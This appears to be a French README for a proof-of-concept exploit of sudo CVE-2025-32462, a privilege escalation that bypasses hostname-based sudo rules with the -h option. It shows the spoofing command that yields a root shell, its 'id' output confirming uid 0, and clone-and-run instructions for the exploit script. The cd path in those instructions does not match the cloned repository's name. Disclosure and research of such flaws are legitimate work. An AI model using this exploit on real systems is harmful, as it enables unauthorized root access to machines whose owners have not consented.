
PoC exploit pour CVE-2025-32462, une élévation de privilèges sudo via usurpation de nom d'hôte. Démontre le contournement des restrictions basées sur le nom d'hôte pour obtenir un accès root sur les systèmes vulnérables (< 1.9.17).
Élévation de privilèges par usurpation du nom d'hôte (CVE-2025-32462)
« Tu prends la pilule bleue... l'histoire s'arrête. Tu prends la pilule rouge... tu obtiens root. »
Cet exploit démontre une vulnérabilité d'élévation de privilèges dans sudo (CVE-2025-32462) où les restrictions basées sur le nom d'hôte peuvent être contournées à l'aide de l'option -h. Le PoC crée un environnement utilisateur restreint, puis s'en échappe en usurpant un nom d'hôte présent sur la liste blanche pour obtenir un accès root.
[user@matrix-node]$ sudo -h zion-core bash # Spoof whitelisted hostname
[root@matrix-node]# id # Got root on wrong hostname!
uid=0(root) gid=0(root) groups=0(root)
Cloner le dépôt :
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape
Rendre exécutable et lancer :
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh
Suivez les invites interactives pour démontrer :
Uniquement à des fins éducatives et de recherche. À utiliser uniquement sur des systèmes que vous possédez ou pour lesquels vous avez l'autorisation de tester.